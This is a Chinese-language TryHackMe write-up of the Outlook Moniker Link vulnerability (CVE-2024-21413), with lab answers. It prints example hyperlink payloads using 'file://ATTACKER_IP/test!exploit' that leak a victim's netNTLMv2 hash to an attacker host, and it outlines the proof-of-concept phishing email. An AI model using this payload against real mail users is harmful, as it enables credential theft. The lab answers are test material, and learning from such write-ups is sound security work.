Tryhackme — Moniker Link (CVE-2024–21413) 作者:Andreyna Marques Carvalho 2分钟阅读·2025年11月13日
任务 1 — 介绍 2024年2月13日,微软宣布了一个Microsoft Outlook远程代码执行(RCE)与凭证泄露漏洞,编号为CVE-2024-21413(Moniker Link)。Check Point Research的Haifei Li因发现此漏洞而受到表彰。
该漏洞在处理一种特定类型的超链接(称为Moniker Link)时,能够绕过Outlook的安全机制。攻击者可以通过向受害者发送包含恶意Moniker链接的电子邮件来利用此漏洞,一旦受害者点击该超链接,就会导致Outlook将用户的NTLM凭证发送给攻击者。
回答问题 该CVE被分配的“严重性”评级是什么? = 严重 (Critical)
任务 2 — Moniker Link (CVE-2024–21413)
通过在超链接中使用 file:// Moniker Link,我们可以指示Outlook尝试访问一个文件,例如网络共享上的文件 (<a href="file://ATTACKER_IP/test">Click me</a>)。此时会使用SMB协议,该协议会使用本地凭证进行身份验证。然而,Outlook的“受保护的视图”会捕获并阻止此尝试。
此处的漏洞在于,我们可以修改超链接,在Moniker Link中包含 ! 特殊字符和一些文本,从而绕过Outlook的受保护的视图。例如:
<a href="file://ATTACKER_IP/test!exploit">Click me</a>。
作为攻击者,我们可以提供这种性质的Moniker链接进行攻击。请注意,远程设备上的共享不需要实际存在,因为无论如何都会尝试进行身份验证,导致受害者的Windows netNTLMv2哈希被发送给攻击者。
远程代码执行(RCE)之所以可能,是因为Moniker Links使用了Windows上的组件对象模型(COM)。然而,解释这一点超出了本练习的范围,因为目前还没有公开的、针对此特定CVE实现RCE的概念验证。
回答问题 我们在超链接中使用了哪种Moniker Link类型? = file:// 用于绕过Outlook“受保护的视图”的特殊字符是什么? = !
任务 3 — 漏洞利用 数据来源:tryhackme.com/room/monike… 概念验证(PoC):
- 需要攻击者和受害者的电子邮件地址。通常,您需要使用自己的SMTP服务器(本练习中已为您提供)。
- 需要密码进行身份验证。对于本练习,
attacker@monikerlink.thm的密码是attacker。 - 包含电子邮件内容(html_content),其中将我们的Moniker Link作为HTML超链接。
- 然后,填写电子邮件的“主题”、“发件人”和“收件人”字段。
- 最后,它将电子邮件发送到邮件服务器。
回答问题 我们在AttackBox上用来捕获用户哈希的应用程序叫什么名字? = responder 一旦电子邮件中的超链接被点击,会捕获到什么类型的哈希? = netNTLMv2
其他任务涉及新的Outlook更新,如果不查看答案,您很可能无法完成练习,这就是为什么答案会在任务中指明。
这是我的学习总结,希望对你有所帮助,别忘了关注。FINISHED CSD0tFqvECLokhw9aBeRqm5orB3AsHVzWqw5nASLxH9NbQfXT2bQPYZThKYCe4Jv48TgTN9cT+sa7UDoads3y/guN6+Q4S1LWPV/MKeUL/p6w4ps0bEExAdq59YOidx2
